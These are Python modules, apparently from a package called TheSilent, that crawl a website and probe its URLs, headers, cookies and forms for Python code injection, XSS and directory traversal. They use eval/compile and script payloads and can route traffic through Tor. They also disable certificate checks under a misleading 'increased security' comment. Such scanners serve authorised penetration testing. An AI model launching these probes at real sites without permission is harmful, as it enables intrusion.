import hashlib
import re
import sys
import time
import requests
from TheSilent.clear import clear
from TheSilent.return_user_agent import return_user_agent

CYAN = "\033[1;36m"
RED = "\033[1;31m"

tor_proxy = {"http": "socks5h://localhost:9050", "https": "socks5h://localhost:9050"}

# create html sessions object
web_session = requests.Session()

# fake user agent
user_agent = {"User-Agent": return_user_agent()}

# increased security
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

# increased security
try:
    requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

except AttributeError:
    pass


def link_scanner(url, secure=True, tor=False, delay=0):
    clear()

    if url.startswith("https://") or url.startswith("http://"):
        my_url = url

    else:
        if secure:
            my_url = "https://" + url

        else:
            my_url = "http://" + url

    hash_list = []
    website_list = []
    visited_list = []

    website_list.append(my_url)
    tracker = -1

    while True:
        time.sleep(delay)
        
        length_count = 0
        tracker += 1
        website_list = list(set(website_list[:]))

        # checks whether a url is valid
        valid_url_count = -1

        while True:
            try:
                valid_url_count += 1
                for i in website_list[valid_url_count].lower():
                    valid_regex = re.search("[\d\w\-\?\.=:/&]", i)

                    if not valid_regex or "script" in website_list[valid_url_count]:
                        website_list.pop(valid_url_count)
                        valid_url_count -= 1
                        break

            except IndexError:
                break

        # start checking for urls
        visited = False
        for visits in visited_list:
            try:
                if visits == website_list[tracker]:
                    visited = True

            except IndexError:
                break

        if not visited:
            try:
                if tor:
                    stream_boolean = web_session.get(website_list[tracker], verify=False, headers=user_agent, proxies=tor_proxy, timeout=(60,120), stream=True)

                    for i in stream_boolean.iter_lines():
                        length_count += len(i)

                else:
                    stream_boolean = web_session.get(website_list[tracker], verify=False, headers=user_agent, timeout=(5,30), stream=True)

                    for i in stream_boolean.iter_lines():
                        length_count += len(i)

            except IndexError:
                break

            except:
                print(RED + "ERROR! " + website_list[tracker])
                website_list.pop(tracker)
                tracker -= 1
                continue

            if length_count <= 100000000:
                try:
                    print(CYAN + website_list[tracker])

                    if tor:
                        my_request = web_session.get(website_list[tracker], verify=False, headers=user_agent, proxies=tor_proxy, timeout=(60,120)).text

                    else:
                        my_request = web_session.get(website_list[tracker], verify=False, headers=user_agent, timeout=(5,30)).text

                    page_hash = hashlib.sha3_512(my_request.encode("utf8")).hexdigest()

                    already_visited = False

                    for hashes in hash_list:
                        if hashes == page_hash:
                            already_visited = True
                            visited_list.append(website_list[tracker])
                            website_list.pop(tracker)
                            tracker -= 1
                            break

                    if already_visited == False:
                        visited_list.append(website_list[tracker])
                        
                        hash_list.append(page_hash)

                        http_url = re.findall("http://\S+|https://", my_request)
                        for links in http_url:
                            if url in links:
                                website_list.append(links)

                        javascript_url = re.findall("[\"\'](/\S+)[\"\']", my_request)
                        for links in javascript_url:
                            if url in links:
                                website_list.append(links)

                        href_url = re.findall("href=[\"\'](\S+)[\"\']", my_request)
                        for links in href_url:
                            if "http://" in links or "https://" in links:
                                if url in links:
                                    website_list.append(links)

                            elif links.startswith("/"):
                                website_list.append(my_url + links)

                            else:
                                website_list.append(my_url + "/" + links)

                        src_url = re.findall("src=[\"\'](\S+)[\"\']", my_request)
                        for links in src_url:
                            if "http://" in links or "https://" in links:
                                if url in links:
                                    website_list.append(links)

                            elif links.startswith("/"):
                                website_list.append(my_url + links)

                            else:
                                website_list.append(my_url + "/" + links)

                except:
                    continue

    website_list = list(set(website_list[:]))
    print(CYAN + "")
    clear()
    return website_list



import time
import urllib.parse
import re
import requests
from TheSilent.clear import clear
from TheSilent.form_scanner import form_scanner
from TheSilent.return_user_agent import return_user_agent

CYAN = "\033[1;36m"
GREEN = "\033[0;32m"
RED = "\033[1;31m"

# create html sessions object
web_session = requests.Session()

tor_proxy = {
    "http": "socks5h://localhost:9050",
    "https": "socks5h://localhost:9050"}

# increased security
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

# increased security
try:
    requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

except AttributeError:
    pass

def python_injection_scanner(url, secure=True, tor=False, delay=1):
    clear()

    if url.startswith("https://") or url.startswith("http://"):
        if url.count("/") == 2:
            if url.endswith("/"):
                my_url = url

            else:
                my_url = url + "/"

        else:
            my_url = url

    else:
        if secure:
            if url.count("/") == 0:
                if url.endswith("/"):
                    my_url = "https://" + url

                else:
                    my_url = "https://" + url + "/"

            else:
                my_url = "https://" + url

        else:
            if url.count("/") == 0:
                if url.endswith("/"):
                    my_url = "http://" + url

                else:
                    my_url = "http://" + url + "/"

            else:
                my_url = "http://" + url

    my_list = []
    init_mal_payloads = [r'eval(compile("import sys\ndef the_silent():\n return sys.version\nprint(the_silent())", "thesilent", "exec"))', r'eval(compile("import sys\ndef the_silent():\n return sys.version\nthe_silent()", "thesilent", "exec"))', r'eval(compile("import time\ntime.sleep(60)", "thesilent", "exec"))']

    # url payloads
    url_mal_payloads = init_mal_payloads[:]
    for mal in init_mal_payloads:
        url_mal_payloads.append("& " + mal + " &")
        url_mal_payloads.append("\\" + mal)
        url_mal_payloads.append("./" + mal)
        url_mal_payloads.append("#" + mal)
        url_mal_payloads.append("\'\'\'" + mal + "\'\'\'")

    new_mal_payloads = url_mal_payloads[:]
    for mal in new_mal_payloads:
        url_mal_payloads.append(mal.upper())

    # other payloads
    other_mal_payloads = init_mal_payloads[:]
    for mal in init_mal_payloads:
        other_mal_payloads.append("& " + mal + " &")
        other_mal_payloads.append("\\" + mal)
        other_mal_payloads.append("# " + mal)
        other_mal_payloads.append("\'\'\'" + mal + "\'\'\'")

    new_mal_payloads = other_mal_payloads[:]
    for mal in new_mal_payloads:
        other_mal_payloads.append(mal.upper())

    # check for python injection in url
    for mal in url_mal_payloads:
        time.sleep(delay)
        new_url = my_url + urllib.parse.quote(mal)
        print(CYAN + fr"checking: {new_url}")
        try:
            if tor:
                start = time.time()
                my_request = web_session.get(new_url, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(120,180)).text.lower()
                end = time.time()

            else:
                start = time.time()
                my_request = web_session.get(new_url, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(120,180)).text.lower()
                end = time.time()

            alert = False
            if "sys" in mal and "gcc" in my_request:
                print(RED + fr"True: {new_url}")
                my_list.append(new_url)
                alert = True
                break
            
            if "time" in mal and end - start > 45:
                print(RED + fr"True: {new_url}")
                my_list.append(new_url)
                alert = True
                break

            if not alert:
                print(GREEN + fr"False: {new_url}")

        except:
            continue

    # check for python injection in headers
    for mal in other_mal_payloads:
        time.sleep(delay)
        print(CYAN + fr"checking headers: {my_url} {mal}")
        try:
            if tor:
                start = time.time()
                my_request = web_session.get(my_url, verify=False, headers={"User-Agent": return_user_agent(), mal:mal}, proxies=tor_proxy, timeout=(120,180)).text.lower()
                end = time.time()

            else:
                start = time.time()
                my_request = web_session.get(my_url, verify=False, headers={"User-Agent": return_user_agent(), mal:mal}, timeout=(120,180)).text.lower()
                end = time.time()

            alert = False
            if "sys" in mal and "gcc" in my_request:
                print(RED + fr"True headers: {my_url} {mal}")
                my_list.append(fr"headers: {my_url} {mal}")
                alert = True
                break

            if "time" in mal and end - start > 45:
                print(RED + fr"True headers: {my_url} {mal}")
                my_list.append(fr"headers: {my_url} {mal}")
                alert = True
                break

            if not alert:
                print(GREEN + fr"False headers: {my_url} {mal}")

        except:
            continue

    # check for python injection in cookies
    for mal in other_mal_payloads:
        time.sleep(delay)
        print(CYAN + fr"checking cookie: {my_url} {mal}")
        try:
            if tor:
                start = time.time()
                my_request = web_session.get(my_url, verify=False, cookies={mal:mal}, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(120,180)).text.lower()
                end = time.time()
                

            else:
                start = time.time()
                my_request = web_session.get(my_url, verify=False, cookies={mal:mal}, headers={"User-Agent": return_user_agent()}, timeout=(120,180)).text.lower()
                end = time.time()

            alert = False
            if "sys" in mal and "gcc" in my_request:
                print(RED + fr"True cookies: {my_url} {mal}")
                my_list.append(fr"cookies: {my_url} {mal}")
                alert = True
                break

            if "time" in mal and end - start > 45:
                print(RED + fr"True cookies: {my_url} {mal}")
                my_list.append(fr"cookies: {my_url} {mal}")
                alert = True
                break

            if not alert:
                print(GREEN + fr"False cookies: {my_url} {mal}")

        except:
            continue

    # check for python injection in forms
    time.sleep(delay)
    forms = form_scanner(url, secure=secure, tor=tor)
    for mal in other_mal_payloads:
        time.sleep(delay)
        for form in forms:
            try:
                action = re.findall("action=[\"\'](\S+)[\"\']", form)
                action = action[0].lower()
                form_input = re.findall("<input.+>", form)
                method = re.findall("method=[\"\'](\S+)[\"\']", form)
                method = method[0].lower()
                name = re.findall("name=[\"\'](\S+)[\"\']", form)

                if url in action:
                    new_url = my_url

                elif action not in my_url:
                    if action.startswith("/"):
                        new_url = my_url + action[1:]

                    else:
                        new_url = my_url + action
                        
                elif action in my_url:
                    new_url = my_url

                for my_input in form_input:
                    form_type = re.findall("type=[\"\'](\S+)[\"\']", my_input)
                    for my_type in form_type:
                        if my_type == "text" or my_type == "password" or my_type == "search":
                            name = re.findall("name=[\"\'](\S+)[\"\']", form)
                            name = name[0]

                            print(CYAN + fr"checking: forms: {new_url} {name}:{mal}")
                            if method == "get":
                                if tor:
                                    start = time.time()
                                    my_request = web_session.get(new_url, params={name:mal}, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(120,180)).text.lower()
                                    end = time.time()

                                else:
                                    start = time.time()
                                    my_request = web_session.get(new_url, params={name:mal}, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(120,180)).text.lower()
                                    end = time.time()
                                        
                            if method == "post":
                                if tor:
                                    start = time.time()
                                    my_request = web_session.post(new_url, data={name:mal}, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(120,180)).text.lower()
                                    end = time.time()

                                else:
                                    start = time.time()
                                    my_request = web_session.post(new_url, data={name:mal}, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(120,180)).text.lower()
                                    end = time.time()
        
                alert = False
                if "sys" in mal and "gcc" in my_request:
                    print(RED + fr"True forms: {my_url} {name}:{mal}")
                    my_list.append(fr"forms: {my_url} {name}:{mal}")
                    alert = True
                    break

                if "time" in mal and end - start > 45:
                    print(RED + fr"True forms: {my_url} {name}:{mal}")
                    my_list.append(fr"forms: {my_url} {name}:{mal}")
                    alert = True
                    break

                if not alert:
                    print(GREEN + fr"False forms: {my_url} {name}:{mal}")

            except:
                continue

    print(CYAN + "")
    clear()

    my_list.sort()

    return my_list



from ftplib import FTP, FTP_TLS
from TheSilent.clear import clear
from TheSilent.command_injection_scanner import command_injection_scanner
from TheSilent.directory_traversal_scanner import directory_traversal_scanner
from TheSilent.html_lint import html_lint
from TheSilent.link_scanner import link_scanner
from TheSilent.python_injection_scanner import python_injection_scanner
from TheSilent.sql_injection_scanner import sql_injection_scanner
from TheSilent.xss_scanner import xss_scanner

CYAN = "\033[1;36m"

# scans for security flaws and bad practices
def web_scanner(url, secure=True, tor=False, delay=1, report=True):
    clear()
    
    my_html_lint = html_lint(url=url, secure=secure, tor=tor)
    my_directory_traversal_scanner = directory_traversal_scanner(url=url, secure=secure, tor=tor, delay=delay)
    my_command_injection_scanner = command_injection_scanner(url=url, secure=secure, tor=tor, delay=delay)
    my_python_injection_scanner = python_injection_scanner(url=url, secure=secure, tor=tor, delay=delay)
    my_sql_injection_scanner = sql_injection_scanner(url=url, secure=secure, tor=tor, delay=delay)
    my_xss_scanner = xss_scanner(url=url, secure=secure, tor=tor, delay=delay)
            
    clear()
    
    new_url = url.replace("http://", "")
    new_url = new_url.replace("https://", "")
    ftp_verify = False

    try:
        ftp = FTP(new_url, timeout=15)
        ftp.login()
        ftp.close()
        ftp_verify = True
        
    except:
        pass

    try:
        ftp = FTP_TLS(new_url, timeout=15)
        ftp.login()
        ftp.close()
        ftp_verify = True
        
    except:
        pass
    
    print(CYAN + "anonymous ftp:")
    if report:
        if ftp_verify:
            with open(new_url +  ".txt", "a") as f:
                f.write("anonymous ftp: True\n")

    print(CYAN + str(ftp_verify))
    
    print(CYAN + "")
    print(CYAN + "command injection:")
    for i in my_command_injection_scanner:
        if report:
            if "http://" in url:
                with open(url[7:] +  ".txt", "a") as f:
                    f.write(i + "\n")
                    
            elif "https://" in url:
                with open(url[8:] +  ".txt", "a") as f:
                    f.write(i + "\n")

            else:
                with open(url +  ".txt", "a") as f:
                    f.write(i + "\n")

        print(CYAN + i)

    print(CYAN + "")
    print(CYAN + "directory traversal:")
    for i in my_directory_traversal_scanner:
        if report:
            if "http://" in url:
                with open(url[7:] +  ".txt", "a") as f:
                    f.write(i + "\n")
                    
            elif "https://" in url:
                with open(url[8:] +  ".txt", "a") as f:
                    f.write(i + "\n")

            else:
                with open(url +  ".txt", "a") as f:
                    f.write(i + "\n")

        print(CYAN + i)
        
    print(CYAN + "")
    print(CYAN + "html lint:")
    for i in my_html_lint:
        if report:
            if "http://" in url:
                with open(url[7:] +  ".txt", "a") as f:
                    f.write(i + "\n")
                    
            elif "https://" in url:
                with open(url[8:] +  ".txt", "a") as f:
                    f.write(i + "\n")

            else:
                with open(url +  ".txt", "a") as f:
                    f.write(i + "\n")

        print(CYAN + i)

    print(CYAN + "")
    print(CYAN + "python injection:")
    for i in my_python_injection_scanner:
        if report:
            if "http://" in url:
                with open(url[7:] +  ".txt", "a") as f:
                    f.write(i + "\n")
                    
            elif "https://" in url:
                with open(url[8:] +  ".txt", "a") as f:
                    f.write(i + "\n")

            else:
                with open(url +  ".txt", "a") as f:
                    f.write(i + "\n")

        print(CYAN + i)

    print(CYAN + "")
    print(CYAN + "sql injection:")
    for i in my_sql_injection_scanner:
        if report:
            if "http://" in url:
                with open(url[7:] +  ".txt", "a") as f:
                    f.write(i + "\n")
                    
            elif "https://" in url:
                with open(url[8:] +  ".txt", "a") as f:
                    f.write(i + "\n")

            else:
                with open(url +  ".txt", "a") as f:
                    f.write(i + "\n")

        print(CYAN + i)

    print(CYAN + "")
    print(CYAN + "xss:")
    for i in my_xss_scanner:
        if report:
            if "http://" in url:
                with open(url[7:] +  ".txt", "a") as f:
                    f.write(i + "\n")
                    
            elif "https://" in url:
                with open(url[8:] +  ".txt", "a") as f:
                    f.write(i + "\n")

            else:
                with open(url +  ".txt", "a") as f:
                    f.write(i + "\n")
                
        print(CYAN + i)



import re
import time
import urllib.parse
import requests
from TheSilent.clear import clear
from TheSilent.form_scanner import form_scanner
from TheSilent.return_user_agent import return_user_agent

CYAN = "\033[1;36m"
GREEN = "\033[0;32m"
RED = "\033[1;31m"

# create html sessions object
web_session = requests.Session()

tor_proxy = {"http": "socks5h://localhost:9050", "https": "socks5h://localhost:9050"}

# increased security
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

# increased security
try:
    requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

except AttributeError:
    pass

# scans for xss
def xss_scanner(url, secure=True, tor=False, delay=1):
    clear()

    if url.startswith("https://") or url.startswith("http://"):
        if url.count("/") == 2:
            if url.endswith("/"):
                my_url = url

            else:
                my_url = url + "/"

        else:
            my_url = url

    else:
        if secure:
            if url.count("/") == 0:
                if url.endswith("/"):
                    my_url = "https://" + url

                else:
                    my_url = "https://" + url + "/"

            else:
                my_url = "https://" + url

        else:
            if url.count("/") == 0:
                if url.endswith("/"):
                    my_url = "http://" + url

                else:
                    my_url = "http://" + url + "/"

            else:
                my_url = "http://" + url
                
    # define payloads
    init_mal_payloads = ["<div>the silent</div>", "<em>the silent</em>", "<iframe>the silent</iframe>", "<input type='text' id='thesilent' name='thesilent' value='thesilent'>", "<p>the silent</p>", "<script>alert('the silent')</script>", "<script>prompt('the silent')</script>", "<strong>the silent</strong>"]

    # url payloads
    url_mal_payloads = init_mal_payloads[:]
    for mal in init_mal_payloads:
        url_mal_payloads.append("& " + mal + " &")
        url_mal_payloads.append("\\" + mal)
        url_mal_payloads.append("./" + mal)
        url_mal_payloads.append("#" + mal)
        url_mal_payloads.append("\'\'\'" + mal + "\'\'\'")

    new_mal_payloads = url_mal_payloads[:]
    for mal in new_mal_payloads:
        url_mal_payloads.append(mal.upper())

    # other payloads
    other_mal_payloads = init_mal_payloads[:]
    for mal in init_mal_payloads:
        other_mal_payloads.append("& " + mal + " &")
        other_mal_payloads.append("\\" + mal)
        other_mal_payloads.append("# " + mal)
        other_mal_payloads.append("\'\'\'" + mal + "\'\'\'")

    new_mal_payloads = other_mal_payloads[:]
    for mal in new_mal_payloads:
        other_mal_payloads.append(mal.upper())
        
    mal_scripts = [
        "<div>the silent</div>",
        "<DIV>THE SILENT</DIV>",
        "<em>the silent</em>",
        "<EM>THE SILENT</EM>",
        "<iframe>the silent</iframe>",
        "<IFRAME>THE SILENT</IFRAME>",
        "<input type='text' id='thesilent' name='thesilent' value='thesilent'>",
        "<INPUT TYPE='TEXT' ID='THESILENT' NAME='THESILENT' VALUE='THESILENT'>",
        "<p>the silent</p>",
        "<P>THE SILENT</P>",
        "<script>alert('the silent')</script>",
        "<SCRIPT>ALERT('THE SILENT')</SCRIPT>",
        "<script>prompt('the silent')</script>",
        "<SCRIPT>PROMPT('THE SILENT')</SCRIPT>",
        "<strong>the silent</strong>",
        "<STRONG>THE SILENT</STRONG>"]

    my_list = []

    # check for xss in url
    for mal in url_mal_payloads:
        time.sleep(delay)
        new_url = my_url + urllib.parse.quote(mal)
        print(CYAN + f"checking: {new_url}")
        try:
            if tor:
                my_request = web_session.get(new_url, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(60,120)).text

            else:
                my_request = web_session.get(new_url, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(5,30)).text

            alert = False
            for script in mal_scripts:
                if script in my_request:
                    print(RED + f"True: {new_url}")
                    my_list.append(new_url)
                    alert = True
                    break

            if not alert:
                print(GREEN + f"False: {new_url}")

        except:
            continue

    # check for xss in headers
    for mal in other_mal_payloads:
        time.sleep(delay)
        print(CYAN + f"checking headers: {my_url} {mal}")
        try:
            if tor:
                my_request = web_session.get(my_url, verify=False, headers={"User-Agent": return_user_agent(), mal:mal}, proxies=tor_proxy, timeout=(60,120)).text

            else:
                my_request = web_session.get(my_url, verify=False, headers={"User-Agent": return_user_agent(), mal:mal}, timeout=(5,30)).text

            alert = False
            for script in mal_scripts:
                if script in my_request:
                    print(RED + f"True headers: {my_url} {mal}")
                    my_list.append(f"headers: {my_url} {mal}")
                    alert = True
                    break

            if not alert:
                print(GREEN + f"False headers: {my_url} {mal}")

        except:
            continue

    # check for xss in cookies
    for mal in other_mal_payloads:
        time.sleep(delay)
        print(CYAN + f"checking cookie: {my_url} {mal}")
        try:
            if tor:
                my_request = web_session.get(my_url, verify=False, cookies={mal:mal}, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(60,120)).text

            else:
                my_request = web_session.get(my_url, verify=False, cookies={mal:mal}, headers={"User-Agent": return_user_agent()}, timeout=(5,30)).text

            alert = False
            for script in mal_scripts:
                if script in my_request:
                    print(RED + f"True cookies: {my_url} {mal}")
                    my_list.append(f"cookies: {my_url} {mal}")
                    alert = True
                    break

            if not alert:
                print(GREEN + f"False cookies: {my_url} {mal}")

        except:
            continue

    # check for xss in forms
    time.sleep(delay)
    forms = form_scanner(url, secure=secure, tor=tor)
    for mal in other_mal_payloads:
        time.sleep(delay)
        for form in forms:
            try:
                action = re.findall("action=[\"\'](\S+)[\"\']", form)
                action = action[0].lower()
                form_input = re.findall("<input.+>", form)
                method = re.findall("method=[\"\'](\S+)[\"\']", form)
                method = method[0].lower()
                name = re.findall("name=[\"\'](\S+)[\"\']", form)

                if url in action:
                    new_url = my_url

                elif action not in my_url:
                    if action.startswith("/"):
                        new_url = my_url + action[1:]

                    else:
                        new_url = my_url + action
                        
                elif action in my_url:
                    new_url = my_url
                        
                for my_input in form_input:
                    form_type = re.findall("type=[\"\'](\S+)[\"\']", my_input)
                    for my_type in form_type:
                        if my_type == "text" or my_type == "password" or my_type == "search":
                            name = re.findall("name=[\"\'](\S+)[\"\']", form)
                            name = name[0]
                            
                            print(CYAN + f"checking: forms: {new_url} {name}:{mal}")
                            if method == "get":
                                if tor:
                                    my_request = web_session.get(new_url, params={name:mal}, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(60,120)).text

                                else:
                                    my_request = web_session.get(new_url, params={name:mal}, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(5,30)).text
                                        
                            if method == "post":
                                if tor:
                                    my_request = web_session.post(new_url, data={name:mal}, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(60,120)).text

                                else:
                                    my_request = web_session.post(new_url, data={name:mal}, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(5,30)).text

                alert = False
                for script in mal_scripts:
                    if script in my_request:
                        print(RED + f"True forms: {new_url} {name}:{mal}")
                        my_list.append(f"forms: {new_url} {name}:{mal}")
                        alert = True
                        break

                if not alert:
                    print(GREEN + f"False forms: {new_url} {name}:{mal}")

            except:
                continue

    print(CYAN + "")
    clear()

    my_list.sort()

    return my_list



import time
import urllib.parse
import requests
from TheSilent.clear import clear
from TheSilent.return_user_agent import return_user_agent

CYAN = "\033[1;36m"
GREEN = "\033[0;32m"
RED = "\033[1;31m"

# create html sessions object
web_session = requests.Session()

tor_proxy = {"http": "socks5h://localhost:9050", "https": "socks5h://localhost:9050"}

# increased security
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

# increased security
try:
    requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

except AttributeError:
    pass

# scans for directory traversal
def directory_traversal_scanner(url, secure=True, tor=False, delay=1):
    clear()

    my_list = []
    mal_payloads = ["cgi-bin", ".env", ".git", ".../"]

    if url.startswith("https://") or url.startswith("http://"):
        if url.count("/") == 2:
            if url.endswith("/"):
                my_url = url

            else:
                my_url = url + "/"

        else:
            my_url = url

    else:
        if secure:
            if url.count("/") == 0:
                if url.endswith("/"):
                    my_url = "https://" + url

                else:
                    my_url = "https://" + url + "/"

            else:
                my_url = "https://" + url

        else:
            if url.count("/") == 0:
                if url.endswith("/"):
                    my_url = "http://" + url

                else:
                    my_url = "http://" + url + "/"

            else:
                my_url = "http://" + url

    for mal in mal_payloads:
        time.sleep(delay)
        new_url = my_url + urllib.parse.quote(mal)
        print(CYAN + f"checking: {new_url}")
        try:
            if tor:
                my_request = web_session.get(new_url, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(60,120)).status_code

            else:
                my_request = web_session.get(new_url, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(5,30)).status_code

            if my_request == 200:
                print(RED + f"True: {new_url}")
                my_list.append(new_url)

            else:
                print(GREEN + f"False: {new_url}")

        except:
            continue

    print(CYAN + "")
    clear()

    return my_list
